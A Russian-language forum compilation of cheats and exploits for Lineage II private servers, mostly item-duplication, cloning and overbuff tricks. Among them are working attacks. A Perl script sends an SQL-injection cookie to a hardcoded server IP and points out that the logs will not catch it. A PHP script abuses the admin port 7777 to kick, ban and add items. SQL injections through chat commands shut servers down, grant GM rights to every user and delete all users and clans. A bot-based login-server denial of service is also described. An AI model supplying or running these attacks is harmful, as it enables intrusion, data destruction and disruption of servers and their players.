Cookies инъекция
Если на вашем сервере не получается сделать инъекцию через сайт стандартными методами (будь то инъекция через
страницу регистрации или другие "глючные" скрипты) не отчаивайтесь.
Возможно на сайте сервера есть "личный кабинет", в который вы входите используя свой логин и пароль (как например на
la2.raid.ru или lineageii.ru)
Скорее всего сделать инъекцию напрямую через поля login и password сделать не получится, т.к. администраторы наверняка
сделали фильтр "зловредных символов".
Но у таких личных кабинетов есть своё уязвимое место.
Заметим что одинажды зайдя на сайт, он "запоминает" нас делая запись с нашими логином и паролем в кукисы. Само собой
когда мы в следующий раз зайдем на сайт, браузер автоматически пошлет наш логин и пароль из кукисов.
Вот тут администраторы и чаще всего ошибаются, забыв сделать элементарную проверку кукисов, в расчете что
пользователь не сможет их править, а зря!
Ниже приведен скрипт, который посылает наш кукис серверу, в котором содержится инъекция.
PHP код:
язык - perl, думаю срипт можно будет без труда переписать на более близкий к вам по духу язык)
#!/usr/bin/perl -w
use IO::Socket;
use strict;
use CGI;
my $host = '212.33.232.148';
#здесь host - IP сервера на который посылается куки (в нашем случае это рейд)
my $EOL = "\015\012";
my $NL = "%0D%0A";
my $BLANK = $EOL x 2;
my $remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)");
unless ($remote)
{
die "cannot connect to http daemon on $host\n";
}
$remote->autoflush(1);
print
$remote
"GET /index.php HTTP/1.0".$EOL.
"Cookie: login=\'SHUTDOWN--".
$BLANK;
while (0 and <$remote>)
{
print;
# last if $. == 200;
}
close $remote;
У данной инъекции есть один весомый плюс:
апач не пишет в свои логи кукисы, так что сделав инъекцию через них администраторы далеко не сразу поймут через что их
взломали.
Fake Death
Подходим к воротам замка, делаешь Fake death нажимаешь fixed - ты стоиш на варотах, а дальше жмеш за воротами в любое
место и все, ты за воротами.
Также можно использовать Fake Death не по назначению - бежим, нажимаем Fake Death и очень быстро отменяем его.
В итоге мы может ходить\бегать с включенным скилом.
По нам никто не может стрелять.
Баг отмытие кармы
Регистрируем 4-6 нубов и ведем их в флоран.
Врубаем нужное число копий валкера и ставим, чтоб они после смерти возращались в город и выбегали наружу (это ооочень просто). сами берем самый дешевый лук (чтоб мана не кончалась) и валим их.
Они бегут непрерывной очередью, лук стреляет быстро... получается где-то 600 пк в час. Набиваем 5982 пк или что тоже самое - 2 в 31-й степени кармы.
Карма перескакивает на минус 2 в 31-й степени. Теперь если мы умрем или убьем любого моба, мы станем беленьким.
Но не торопимся ! Мы можем килять всех пока карма отрицательная, а это 2200 пк , т.е. неограниченно.
Теперь берем пяток соклановцев и идем... к примеру в круму. Можем брать любой шмот - из нас НИЧЕГО НЕ ВЫПАДЕТ. МЫ МОЖЕМ УБИВАТЬ КОГО УГОДНО, МЫ КРАСНЫЕ, НО УБИТЬ НАС - ВСЕ РАВНО ЧТО УБИТЬ БЕЛОГО ЧАРА ! Т.е. мы мочим-мочим нубов и приходит хайлевел - защитник... Он нас убивает, и мы падаете уже белым... а он становиться красным ! Эстафета передается ). Думаю он будет в шоке... короче нас реснут и мы меняемся местами...
После этого делим с соклановцами лут , идем в флориан и набиваем теперь уже 2200 пк (т.е. за три- четыре часа)... И снова становимся МЕГА ЧЕЛОМ С ОТРИЦАТЕЛЬНОЙ КАРМОЙ. В следующий раз придется набивать еще меньше , потом мы будем становиться с отрицательной кармой каждые 1000 пк... потом каждые 600..., т.е каждый час мы сможете в присутствии соклановцев делать красным хайлевела в шмоте !!!!!!
А вообще вот вам приблизительный закон возрастания кармы : 122.24(PK) + 56.96(PK)^2 . у кого есть голова и маткад сами могут подсчитать как часто чар будет становиться белым, т.е. набирать 2в 31-й степени, потом 2*(2^31), потом №*(2^31) и так далее.
Да. еще... кто не в курсе ... отмыть реально ... ну 50к кармы. Если 40-го левела отмывать смертями, то он станет 4-м левелом отмыв где-то 80к кармы и больше кармы спадать не будет. Чтобы отмыть 999998 надо завалить где-то 100к мобов своего левела, что нереально.(я пишу именно 8 на конце, т.к. 999999+ кармы значит лишь что ее между 1кк и 2ккк (2 в 31-й степени))
Баг с 7777 портом
PHP код:
$char_name='char_name';
$fp = fsockopen("server-ip", 7777, $errno, $errstr);
if (!$fp) {
echo "$errstr ($errno)
\n";
} else {
$out = "5"."\t".$char_name."\t"."\r\n";
fwrite($fp, $out);
stream_set_timeout($fp, 2);
$answ = fgets($fp,8);
if ($answ==1) {
print"Character is successfully kicked.";
} else {
print"Error.";
}
fclose($fp);
}
?>
Скрипт выше кикакет игрока с ником "char_name" с сервера "server-ip".
Если поиграться с отправляемой строкой, то можно глумиться над сервером как душе угодно.
Вот примеры некоторых строк:
PHP код:
// $out = "5"."\t".$char_name."\t"."\r\n"; // kick
// $out = "5\t{$char_name}\t\r\n"; // kick
// $out = "6\t{$char_name}\t5\t5\t\r\n"; // skill add
// $out = "4\tprobe2\tprobe\t\r\n"; // CHANGE_CHARACTER_NAME
// $out = "39\ttester\t1\t\r\n"; // BAN_CHAR
// $out = "50\tasd\ttester\t1\t1\t\t\t\t\r\n"; // MAN_ANNOUNCE ?
// $out = "45\tprobe\t\t\r\n"; // SEND_HOME ?
// $out = "12\tprobe\t0\t57\t10\t0\t0\t0\t0\t0\t\t\r\n"; // ADD_ITEM
// $out = "12\tprobe\t0\t1148\t1\t0\t0\t0\t0\t0\t\t\r\n"; // ADD_ITEM
// $out = "12\tprobe\t0\t4189\t1\t0\t0\t0\t0\t0\ttester\t\r\n"; // ADD_ITEM
Проблема лишь в том что 7777 порт закрыт практически на всех серверах.
Однако если вдруг вам попадется удача и на вашем сервере это будет работать, то считайте что вам повезло.
Баг с лотереей
Заполняем инвентарь до 78, покупаем лотырейный билет, покупаем в магазине карту(инвентарь заполнен на 80/80), и тогда
билет останется на месте. Приемлемо для серверов с рейтам х1 и для низко-средне уровневых персов для зарабатывания
денег.
Баг с матильдой
Почти всем известный и любимый баг с Алхимиком.
Она находится на северо востоке от Ivory Tоwer, дает квест с 35 уровня.
При получении Wising poition в конце квеста, просто нафлудите в инвентарь хлама типа стрел, кристалов т.д.
Чтобы инвентарь был заполнен на MAX (85). В этом случае когда вам дадут vish poit вы сможете "заканчивать" квест бесконечно.
А так как там неплохой шанс получить 10кк.
Баг с переполнением
Баг на 2^32=4.294.967.296 - ето баг на адену, покупаем такое количество стрел через бота ето выйдет около 100кк адены и загрузка около 1%, потом продаем стрелы пачками по 100кк (не больше)
Баг с продажей
Баг с private story sell.
Человек А ставит в приват стори вещь за 4.967.297а и 500 любых других вещей (стреы ССки кристалы) по 10.000.000.
После этого человек Б покупает вещь и 429 вещей по 10.000.000, и цена в торге станет 1а.
Также, если стоит цена 14.967.297а то просто надо купить 428 вещей по 10.000.000, и так механизм прост х4967297а и 429-х вещей по 10.000.000.
Если поставить цену за предмет 5.000.000а, то цена в торговле будет не 1а, а 32.000 (с копейками)
Бессмертие (демон сет)
Собираем Demon SET (магический сет который дает -240 Х и + М атаку , вроде + 3 INT ).
Создаем Мага 1ого лвл , одеваем этот сет , и ХП уходит в МИНУС , и вы становитесь БЕССМЕРТНЫМ.
Быстрый захват замка
Если на серваке небольшой онлайн, и еще остались незавоеванные замки, то можно его захватить за 10-30 минут.
1.Надо создать клан Даггерщиком.
2.Начинается осада, включаем Silent Move, и идем покорять замок, гуарды не трогают тебя.
Подходишь к Главному Артефакту, и включаешь клан-магию.
Главное не трогать Гуардов, иначе они могут наброситься и сразу убить
Бюп - обход фикса
1. Берем двух чаров (пусть будут тот кого клонируем - 1, а другой 2) ставим их гденибудь в безлюдном месте
2. рес который мы будем дюпить должен быть таким чтоб его могло лежать много в одном слоте
3. в валкере выбираем ентер чар мануал, открывается окно с выбором чаров его оставляем, потом логаутимся, выбираем каким чара 1 и логинимся.
4. сажаем чара 1 в продажу етого ресурса по 1а.
5. в оставшемся окне с ентер чар мануал выбираем 2-ого чара и
жмем ОК, то есть заходим им. 6. заходим и видим как чар 1 сидит в продаже.
7. открываем окно продажи у чара 1 и скидываем ресс вниз (как бы хотя купить) но не нажимаем ок
8. логаутимся и заходим чаром 1 (при этом окно продажи так и висело не закрытым) и нажимаем ОК
(получается что чар покупает рес у самого себя, тобишь у клона. Потом релогинимся и дынц видим как то что вы дюпили кол-во увеличилось в двое)
Обход фикса клона 1
1) садимся на продажу ботом
2) нажимаем в окне MANUAL на Char1 (если он у тебя 1-й по списку и единственыый на твоём акке)
3) сразу жмём ЛОГАУТ до того, как тебя выкинет сам бот
можно дюпать и работает мультипрофа
Обход фикса клона 2
1) заходим клиентом
2) в зале, где выбирать игроков, создаём любого "левого"
3) выбираем 2-го игрока
5) нажимаем удалить
4) нажимаем да
5) идет задержка секунды 2-3, быстро тыкаем START
6) получается, что мы не успели увидеть, как его посадили на удаление
7) когда заходим в игру, то видим следующее -
твой чар стоит, и у тебя есть все кнопки:
START, DELETE, RELOGIN
8) выбираем теперь слева со списка игрока 1 и жмешь START
9) чар подключается опять и клонируется
токо на 2 фиксе дюпать нельзя, а клона мона ставить, то есть мультипрофа пашет
Обход фикса клона 3
1) на акке должно быть 2 чара
2) заходим чаром 1
4) ставим его торговать
3) заходим чаром 2
4) 1 чар остаётся в игре
5) подходим к чару 1 и скидываем вещи которые он продаёт вниз
6) заходим чаром 1
7) нажимаем "ок"
Проверено ла2ру
Обход фикса клона 1+3
1) на акке должно быть 2 чара
2) заходим Мануал (не закрываем окно) или просто делаем рестарт
3) заходим чаром 1
4) ставим его торговать
5) заходим через "Manual" чаром 1 и срузу же жмём "LOGOUT"
6) заходим чаром 2
7) 1 чар остаётся в игре
8) подходим к чару 1 и скидываем вещи, которые он продаёт вниз
9) "Restart" не закрывая окно торговли
10) заходим чаром 1
11) нажимаем "ок"
Фиксов по-моему около 4
1) слежение за мануал логином чара (la2.ru)
2) запрет на мануал, если залогинен в каком-нибудь чаре (l2server.ru)
3) запрет на трейд с самим собой (la2.ru)
4) полный фикс (antaras.ru; la2.chel.ru) - выдаёт сообщение:
"enter char failed"
дополнительный фикс
-чар садится на удаление без задержки
Дополнитеьные скрипты
1) автобан за клона
2) автобан при попытке купить у самого себя
3) запрос на чаров с большим количестовом адены, ресурсов, одинаковые ID уникальных вещей
4) запрос на аккаунты с большим количеством логинов в день
Для обхода совмещённых фиксов 1 и 3 используется 4 обход клона, для второго фикса пока у меня пока нет дюпа, для 4ого фикса пока нет вообще обхода
4 фикс клона - обход?
Вместо закрытия SOCKET'a юзера, в последнем патче сервер отправляет команду `leaveworld`
Закрытие сокета - выкидывание из игры при мануале на того же чара (без фиксов).
Обход 2 и 4 фикса клона
Сервер запрещает пользоваться мануал или кикает при использовании
1) надо попробовать сделать клон через кнопки Create char, Delete char
2) использовать альтернативных ботов
3) сделать логаут из игры, не закрывая окно мануал
Вечный голем
1. Вызываем голема (механического, не осадного).
2. В верху рядом с окном ХП, МП, EXP персонажа появляется окно ХП, МП и полоска времени действия голема (зеленая).
3. Теперь приказываем голему атакавать какую либо цель НПС(если есть) или персонажа (не удерживая кнопку CTRL, тогда
голем просто будет следовать за тем игроком, что вы ему приказали, при условии, что он не ПК).
4. Теперь вы должны убежать от своего голема на большое растояние, чтобы окно с его ХП, МП и полоска времени
действия голема (зеленая) исчезла, после чего бежим сново к своиму голему и видим, что его полоска времени сново
полная.
Гномо - маг
Открываем клиент, заходим на акк, жмём создать акк Выбираем рассу человек - в артмани ищем 0. Меняем рассу на эльфа - отсеиваем 1. и так пока не останется 3 адреса (человек - 0, эльф - 1, афроэльф - 2, орк - 3, гном - 4). Потом ищем 2 адреса класса (маг - 1, воин - 0), пока не останется 1-2 адреса. В первом адресе рассы ставим гнома, в других 2 - любую рассу (или наоборот), в адресах класса ставим 1. Нажимаем создать. Если пишет что-то про ник - значит фикс.
Дюп с лагом
Нужно знать когда сервак ребутнется, и если от первого перса второму скинуть вещицу, вторым выйти и остатся первым, в
последние 30 секунд, то будет дюп.
Дюп сосок
Берете бота 10.6, запускаете его, покупаете 1 соску, бежите в далекое место и выбрасываете эту соску, но при этом, когда
выбрасываете вводите число выбросить столько сколько нужно сосок.
Выбрасывается одна, а запоминается много.
Заходите клиентом этого же перса и поднимаете ни одну соску, а к примеру 10к уже, все зависит от числа, пробуйте, может
больше будет! Соска должна быть 1 в инвентаре.
Дюп страйдеров
Вызываем страйдера, пусть страйдер бьет любого НПЦ.
Когда нажимаем бить НПЦ - он будет бежать, потом возвращаться - просто много раз кликаем и он без перерыва будет бить (контрол нужно зажать)
Сами уходим к ГК. Телепортируемся в другой город. Потом в кнопке действий находим кнопку - сесть на страйдера. Мы сели на страйдера. Потом релогин.
Трубку отдаём другу. Приходим в город, а наш страйдер всё бьёт НПЦ.
Нажимаем на него, и жмём на кнопку return. Он возвращается в рюкзак и появляется трубка.
Дюп через пакеты
1.Пусть ваш друг предложит вам трейд в тот момент когда вы будете использовать сниффер, и поймаете пакет трейда.
2.Когда поймали, предложите трейд вашему другу еще раз.
3.Положите в трейд 1 адену.
4.Теперь посылайте пакет трейда на сервер.
5.После этого закройте окно трейда(У вашего доруга окно трейда будет еще открыто)
6.Положите вещи, которые хотите дюпнуть в ВХ.
7.Предложите трейд вашему другу еще ра, и после того как он подтвердит трейд, вы нажмите Cancel.
Теперь, те вещи которые вы положили в ВХ, будут в вашем инвентаре тоже.
Избавление от веса
Все уже давно знают, что якобы на С3 переменная у торговцев вычисляется по
особому....
НО, под этой переменной, т.к. все фри
сервера сделаны на так скажем на основе С1, скрывается совсем иное значение
для серв. станции...
Следовательно когда мы набирает Вещей на сумму:
4.294.967.296, это два в 31ой или 32ой степени.... то сервер понимает это
не как 4.294.967.296 а как два раза минус
2.147.483.648 т.есть 0аден, Вот и все....
Если говорить еще точнее (все что ниже написано видно прекрасно на боте):
То после 2.147.483.648 сумма уходит в минус ((для сервера) мы то видим что
типа все нормально....), и начинает возростать.... И
теперь уже отрицательную сумму мы должны довести до логического
завершения.... Т.е. довести до +, до нужной суммы она то и будет
для вас покупной....
Т.е. когда а магазине цыфра перевалила за 4.294.967.296, то можете спокойно
отнимать от вашей суммы 4.294.967.296 и вот сколько
получиться за столько вы все и купите Если вес, инвентарь и т.д.
позволяют....
Это так скажем про адену. А теперь что бы достичь одновременно и денег и
анлима... Надо смотреть еще и на вес, с ним происходит
тоже самое...
Вот вам формула. Она вычесляет коффициент.... k = a / v;
где а - это цена вещи, а v - вес.
Для чего она нужна, все знают баг с переполнение денег (описаный выше),
т.е. если денег будет за (2 в 32ой) 4294967296... то
они превратяться в 0 и отсчет будет по новой. Так вот с весом происходит
тоже самое.... тоесть и вес точно так же можно
обмануть....
-> если подобрать такую вещь у которой при каком-то кол-ве будет и веса и
денег переваливать за f*4294967296 (f - тут любое
-> целое натуральное число) и оно будет близко к 0 при новом отсчете.... То
тогда можно на любом шарде будет мутить адену.... ах
-> да то есть надо найти k которое будет целое натуральное число.... потом
делим 4.294.967.296 на вес округляем в сторону большего и закупаем это кол-во. вещи.
Изучение любых скилов
Допустим у вас есть DA 40lvl, вы хотите изучить скилл допустим 60 уровня.
1)качаете на пвп серваке DA до 60+
2)заходите ботом, подходите к мастеру, нажимаете учить скиллы, появляется табличка со списком скиллов
3)делаете логаут, табличка со скиллами при этом остаётся открытой
4)выбираете в боте из списка тот сервер, где у вас DA 40+, подходите к тому же мастеру, что и на пвп серваке, кликаете на него два раза,чтобы появился диалог, и в табличке со скиллами, оставшейся с пвп серва, учите скиллы.
Главное, чтобы хватило СП. Также можно учить скиллы чужих рас.
Квест баг
Проходим простенький квест, наградой за который - опыт и сп.
Дюпаем последний квестовый предмет.
Затем передаём дюпнутые квестовые предметы пэту.
Например для моего квеста нужно 8 клыков паука, значит я передаю эти 8 клыков от пэта своему чару.
Жмем квест - квест у нпц и получаем награду.
Берем квест заново.
Заново перекидываем 8 клыков чару и так до бесконечности!
Автоматизировать можно макросом или скриптом.
Кил логин сервер
1.Берем забаненого перса.
2.Вклю4аем Л2волкер(!)(настравиваем его к серваку, подклю4аем)
3.При подклю4ении бот войдет на сервер и выдаст Вам сообщение, 4то с 4аром у Вас проблемы.
4.В опциях волкер ставим релогин и время равное 1 секунде.
5.Как бот поймает подклю4ение к серверу, он от него не отклю4ится.
6.Другие игроки не смогут подклю4иться к серверу, пока работает волкер
Обход текстур
Подходим к стене/горе/двери, вообщем через что нельзя пройти.
Подойти нужно в упор. Вызываем страйдера и садимся на него.
ТК страйдэр занимает намного больше места чем игрок, часть перса оказывается в текстуре.
Нажимаете вперед или наверх куданить и преодолеваем текстуру.
Если это гора, то вы окажитесь в горе, если дверь, то вы просто пройдете насквозь.
Обход фикса фейка
Есть серверы - например la2world.ru, где способ с дропом заточки пофиксен (заточку нельзя выкинуть из инвентаря).
Тут нужно идти от обратного, то есть выкидывать не заточку, а предмет который точишь.
Я делал следующим образом - дожидался лага сервера или создавал его сам (когда выкидываешь вещь, то она не выбрасывается, а так и остается лежать в инвентаре), выкидываю вещь, подтверждаю, и точу, шансы заточек точно так же будут показываться, но вещь не будет ломаться, до тех пор пока лаг не пройдет и вещь не выкинется из инвентаря, заточки также не будут тратиться.
Овербафф
(1)запускаем l2walker.
(2)пишем логин и пароль.
(3)выбираем каким чаром будем заходить в игру.
(4)Нажимаем кнопку Login.
Атеперь выполняйте эту последовательность:
22:38:01 ??????II????????www.tt2xz.com??????????????????
22:38:01 Link LoginServer Succeed.
22:38:04 Login LoginServer Succeed.
22:38:09 Link GameServer Succeed.
22:38:10 Logout Game.
22:38:10 ??????II????????www.tt2xz.com??????????????????
22:38:11 Link LoginServer Succeed.
22:38:14 Login LoginServer Succeed.
22:38:18 Link GameServer Succeed.
22:38:20 Logout Game.
22:38:21 ??????II????????www.tt2xz.com??????????????????
22:38:21 Link LoginServer Succeed.
22:38:26 Login LoginServer Succeed.
22:38:31 Link GameServer Succeed.
22:38:37 ->Enter Char[2].
22:38:37 Logout Game.
22:38:38 ??????II????????www.tt2xz.com??????????????????
22:38:38 Link LoginServer Succeed.
22:38:44 Login LoginServer Succeed.
22:38:47 Link GameServer Succeed.
22:38:53 ->Enter Char[2].
22:38:54 Logout Game.
после этого нажмите опять Login и после этого зайдите в игру,точнее вы не зайдете в игру так как вас выкинет.
если вас не выкинуло значит овербафф не получился.
22:38:54 ??????II????????www.tt2xz.com??????????????????
22:38:55 Link LoginServer Succeed.
22:39:00 Login LoginServer Succeed.
22:39:04 Link GameServer Succeed.
22:39:10 ->Enter Char[2].
22:39:14 Welcome to the World of Lineage II.
22:39:14 SYSTEM : Welcome to Lineage2World
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : Giran Shops move to Giran Bazaar
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : WTS/WTB use the +Trade window
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : Attacking NPCs results in BAN
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : Read the Rules & FAQs
на этом месте ваш игрок вылетает!
====Ускоренный овербафф====
1.1) Заходим в Лайнэйдж через клиент...
1.2) Делаем себе бафф(ы) который(ые) хотим удваивать (утраивать и т.д.)
1.3) Пытаемся найти место где поменьше глаз...
1.4) Выходим из игры...
2.1) Заходим в L2Walker 10.2.3 (как уж им пользоваться сами сможете найти)
2.2) Пишим Login (ID) и Password (PSW)
2.3) Ждем надписи:
17:39:01 ->Enter Char[Х]. - тут вместо [X] стоит номер вашего персонажа....
2.4) Как дождались надписи быстро жмем Logout.
2.5) В 10.2.3 это будет выглядеть примерно так:
17:38:47 Link LoginServer Succeed.
17:38:52 Login LoginServer Succeed.
17:38:56 Link GameServer Succeed.
17:39:01 ->Enter Char[6].
17:39:01 Logout Game.
3.1) После этого, даже если на вашем сервере стоит задержка все равно нажав вследующий раз Login то вас должно выкинуть при заходе в игру...
4.1) После этого опять в том же L2Walker 10.2.3 нажимаем Login
4.2) Ждем полного захода в игру...
4.3) После того как ваш бот зашел... И появились точки на карте, инфо о вашем чаре... То вверху опять должен загореться Login...
4.4) Поздравляю вас выкинуло.
4.5) Должно получиться примерно следующее:
17:39:02 Link LoginServer Succeed.
17:39:06 Login LoginServer Succeed.
17:39:10 Link GameServer Succeed.
17:39:28 ->Enter Char[6].
17:39:29 Welcome to the World of Lineage II.
17:39:29 SYSTEM : Welcome to Lineage II Extreme 35x!
17:39:29 SYSTEM : You Are being Watched, so be good.
17:39:29 SYSTEM : Vote daily at http://vote.l2extreme.com!
-= вот тут вас выкинет =-
5.1) Строки типа ХХ.ХХ.ХХ System : blablabla.... зависят от вашего сервера, то есть если разные серваки то будут и разные последнии строчки....
6.1) Зайдя в игру вы увидите ровно удвоенное количество баффов на вас....
6.2) Если хотим больше, все просто повторяем процедуру 2.1 - 4.5
7.1) Как умножаются баффы:
{первая цифра означает кол-во баффов на старт}
1 - 2 - 4 - 8 - 16 - 20 (ясень пень 32, но иза того что ограничение всего 20 то и баффов будет именно 20)
2 - 4 - 8 - 16 - 20
3 - 6 - 12 - 20
4 - 8 - 16 - 20
5 - 10 - 20
6 - 12 - 20
7 - 14 - 20
8 - 16 - 20
9 - 18 - 20
10 - 20 (если у вас на старт больше или равно 10 баффам, то сделать процедуру надо всего один раз...)
7.2) Распределение баффов будет выглядеть так (не более чем пример):
ВиндВолк - Акумент - Емпов - Шилд - ВиндВолк - Акумент - Емпов - Шилд - ВиндВолк - Акумент {первая строка}
Емпов - Шилд - ВиндВолк - Акумент - Емпов - Шилд - ВиндВолк - Акумент - Емпов - Шилд {вторая строка}
7.3) при раскладе где преведушее число умноженное на два дает не ровно 20... Там, бафа который стоит первым в очереди будет больше чем всех остальных...
Открытие хелпа
Если не открывается Хелп:
1. Если запускаете игру не через l2.exe , а с помощью загрузчика - избавляйтесь от последнего.
2. файл l2.exe должен быть оригинальный, его можно подобрать из других папок system (почти все сервера свои system выкладывают), но его редко правят.
3. либо меняете nwindow.dll тоже на оригинальный, либо делаете следующее:
Решение для любителей Winhex:
(если конечно гейм гвард не запущен)
открываем процесс l2.exe, ищем модуль nwindow.dll
ищем строку
90908B11FF92B4000000
и меняем на
740C8B11FF92B4000000
Либо ищите и меняйте это внутри nwindow.dll, если он не запакован, конечно.
Пакетное строение
И так пакетное строение -
ff ff ff ff ff-в пятом байте -меняем так чтоб получилось ,перегрузка игры=)
ВПЕ -ставим (прием и отправку -меняем)
под {ff ff ff ff ff и так далее}- вас свои значения - при атаке сами поймайте пакет ==))(17 00 ля ля ?? -вот тут меняем). Чтобы перегруз был следствие - когда вы запустили ВПЕ фильтр - у вас будет ровно 2 сек на удар - Рейдбоссу (желательно стоять рядом) потом экран темнеет и вы сного подгружаетесь - замечаете: повреждение вы нанесли, а босс ни атакует (таким образом сбрасывается атака нпс'ов на вас).
Покупка по цене продажи
Можно покупать соски, бутылки по цене, за которую их продаёшь (50% помойму).
-подходишь к продавцу, кладешь 5 бутылок (к примеру).
-в артмани ищешь значение, убираешь 1 бутылку, отсеиваешь, пока не получаем 3 значения, или около того.
-теперь меняем значения на "-10" (к примеру), сразу в артмани появляеться какая-то ахинея вместо "-10".
-переключаемся в клиент, и видим что на лотке лежит "-10" бутылок.
-смело жмём ок, и получаем 10 бутылок, по цене которой у нас их барыга-продавец хотел купить.
Покупка через пакеты
Подходим к трейдеру-нажимаем,чтобы появился диалог, посылаем пакет C0x1f с нужным ID шмотки, и покупаем её, даже если она не может продаваться в магазе. В некоторых случаях покупается за 0 адены.
Превышение веса
Нагрузить дракона под завязку, и себя под завязки и дракона вернуть. Вес будет больше 100% - можно будет нагрузиться хоть на 20К%
Скорость атаки ( - )
1.Выбираем сервер с высокими рейтами (желательно , но не обязательно )
2. Нам понадобяться 2 чара желательно оба равного лвл, 1ый чар - ЛУЧНИК (ОБЯЗАТЕЛЬНО) 2ой ШИЛИН ЭЛДЕР или ШИЛИНГ КНАЙТ (желательно 1ое , хотя на некоторых сераках и то и то одинаково работает)
3. Лучником наскорую качаемся до лвл конкурентов (ну до 80 к примеру) на ПВП сервака это быстро ... Внимание НЕ КАЧАЕМ СКИЛ ХАСТЕ (при читерстве надо быть без бафа вообще , без вссяких сетов которые прибавляют Скорость атаки), если есть возможность купить краски для тату то покупаем -5 DEX (желательно , весьма нужная штуковина) Покупаем VERY SLOW лук , SOUL BOW пойдет 100 проц , Желательно если вы 52 лвл напяливаем что нить что дает штраф.
4. Запускаем бота ШИЛКУ ЕЛДЕЛА , флагаемся (бот должен приблизительно быть одинакового лвл) сразу кидаем ВИНД ШАКАЛА (который снижает скорость атаки) либо Шилкой кнайтом КУБИКОМ понижаем себе же скорость атаки , ДЕБАФ спадает через 2-5 минут , но эффект скорее всего останеться на 90 проц (на крутых шардах фикс стоит на 2-5 минут , но этого вполне хватает что бы завалить антараса или ешё кого нить)
5. Ваша скорость Атаки заходит в МИНУС , а это значит что скорость атаки у вас 99999.
Вообще смысл бага сделать все возможное что бы скорость атаки была как можно меньше , и когда накладывался ДЕБАФ она вообще уходила в минус.
Скорость атаки Тиранта
Вообщем у туранта есть такой скилл, как Fist Fury, заключаеться он в том, что когда его включаешь вместе с кастетами, он непрерывно сосет ману, но при этом довольно существенно возрастает скорость атаки.
Как это можно использовать: одеваешь туранту костеты, включаешь этот скилл, а потом переключаешься на даггер, не отключая скилла.
В итоге получаем огромную скорость атаки даггером.
Создание клона
Создание клона в Lineage 2
0)Делается все только ботом:
1)Напишите логин, пароль
2)Выберите чар "мануал", нажмите логин
3)Выскочит окно с вашими созданными персами
4)Ничего не выбирайте, и не закрывайте это окно
5)Нажмите "ЛОГАУТ"
6)Выберите в раскрывающемся меню выбора чара номер чара и нажмите логин, зайдя в игру
7)Выберите перса в окошке (которое вы не закрывали), и которым вы только что зашли в игру
8)Когда вы нажмёте ENTER в том окне, произойдёт ЛОГАУТ
9)Затем выберите номер перса (того самого, которого вы только что клонировали) из раскрывающегося меню выбора чара, и нажмите "Логин"
10)Теперь у вас есть клон.
Споил баг
Идём собираем паровоз, потом слипаем их, орком шаманом (ну в общем магом с ядом) травим, в это время ваш гном делает спойл фестиваль,потом как остаётся минимум жизней у мобов,убиваем одного моба, делаем свипер, и получаем спойл со всех мобов, а не с одного убитого.
Способ заточки
1:Ставим заточку на F1
2:Ставим Антидот на F5
3:Ставим Поднять на F8
4:Выкидываем Вашу заточку из инвентаря и одновремено активируем ее, с помошью хот кея. Итог: заточка внизу под вами, а на уровне инвентаря курсор с "ложной заточкой".
5:Теперь жмем на антидоты. Когда не пьются (значит сс лагает) - кликаем по веши которую точим и видим + или - . Если плюс, то тыркаем подбор скрола и ждем конца сс лага. Соответственно если минус, то не подбираем до конца лага.
Способ овербаффа
Берем бота.
Желательно работающего и настроеного на нужный нам сервак.
Заходим чаром и юзаем на себя какойнибуть бафф желательно 1-3 баффов.
Потом через бота заходим чаром и юзаем Potion of alacrity или swift attak potion.
Далее выходим и в настройках бота ставим релогин 1 и галочку на авто релогине.
Потом заходим опять же через бота на чара, и когда пишет "enter char...", то мы жмем логаут.
Потом опять логин, но на этот раз нас сервак викидывает сам.
Мы опять заходим и когда опять появляется "enter char..." мы опять жмем логаут.
И опять заходим, чтобы нас выкинул сервак и так далее.
Что это нам дало. А дало нам это умножение нашего баффа в геометрической прогресии.
Т.е. наш овербафф состоящий из 3 баффов размножился во многа раз.
Способы инъекций
/block 'RESTART--
/block 'SHUTDOWN--
/block 'UPDATE user_data SET builder = 1 WHERE char_id > 0''-- (после рестарта - все становятся ГМами)
/block 'delete/**/pledge-- (удаление всех кланов)
/block 'delete from user_data-- (удаление всех юзеров)
/block 'exec(lin_setBuilderAccount'аккаунт',1)-- дает указанному аккаунту права ГМа
Также место /block можно использовать /friendinvite (т.к. и блок и фриенд - обращаются напрямую к БД)
Стирание клонов
Вообщем, нам потребуется :
1. Любой вепон (лучше Д грейд на всякий случай) проточенный на +3
2. 1 заточка грейда соответсвующая вепону.
3. Умение точить фейком без ВХ.
4. Сервер, на котором бывают хотябы 5-10 секундные лаги (то есть сски не юзаются, банки не пьются, не растёт какос)
Способ :
Сваливаем куда-нибудь в безлюдное место.
Берём в руки веапон, а заточку кладём на хоткей.
Потом, берём энчант, и кидаем его на пол (у вас выскочит табличка - выкинуть или нет).
Ничего не нажимаем.
Далее любыми бутылками тестим лаг, то есть пьём их раз в 1-2 секунды (предварительно, конечно, надо положить банки на хоткей).
Как только бутылка не выпилась - пошёл лаг.
Нажимаем выбросить скрол, и быстро тыкаем на хоткей с энчантом.
Потом быстро, раз в полсекунды (но не так быстро чтобы пушка при даблклике упала на бэкпэк) начинаем фигачить на вепон.
У вас в окошке системном будет чтото типа - заточилось, заточилось, заточилось, заточилось, незаточилось, заточилось - и тд,
смотря сколько успели натыкать, столько надписей и будет.
Далее лаг отходит, скрол падает на пол (а возможно и нет), и вы наблюдаете надпись - Sorry, you have been disconected
Трейд Баг
Баг с торговлей.
Проходит редко.
Человек А кладет вещи в торговлю (trade), в это время человек Б нажимает ОК, и делает рестарт. ~30% шанс что у человека А нажмется ОК и вещь перейдет человеку Б.
Убийство админа
Админа можно убить возвратом dmg (tatoo+buff+песня+танец), главное разозлить достаточно сильно, чтобы он решил тебя
завалить, но не так сильно чтобы написал //kill или забанил.
Убийство Антараса
Итак идем через гиран кастл в сторону ЛОА по карте. идем идем... встречаем горы.
Через горы не пройти ((( подходим вплотную к скале (там рядом такой камень еще лежит) и жмем кнопку вперед.
Получается что мы бежим в стену - через некоторое время нас закидывает наверх.
Открываем карту и бежим (по горе уже) в сторону антарас нест. Там такое огрооооооооомное поле.
Доходим до туда, где у антараса начинается хвост: сиречь задница и ищем место где находится стык текстур (видно как будто 2 слоя рядом сложили) - Ставим чара на этот стык.
Выходим из игры.
Заходим ботом - включаем отображение монстров и НПЦ - видим антараса.
Выбираем его - у него 10кк жизней (ойойой).
Нажимаем атаковать - ждем 2 минуты.
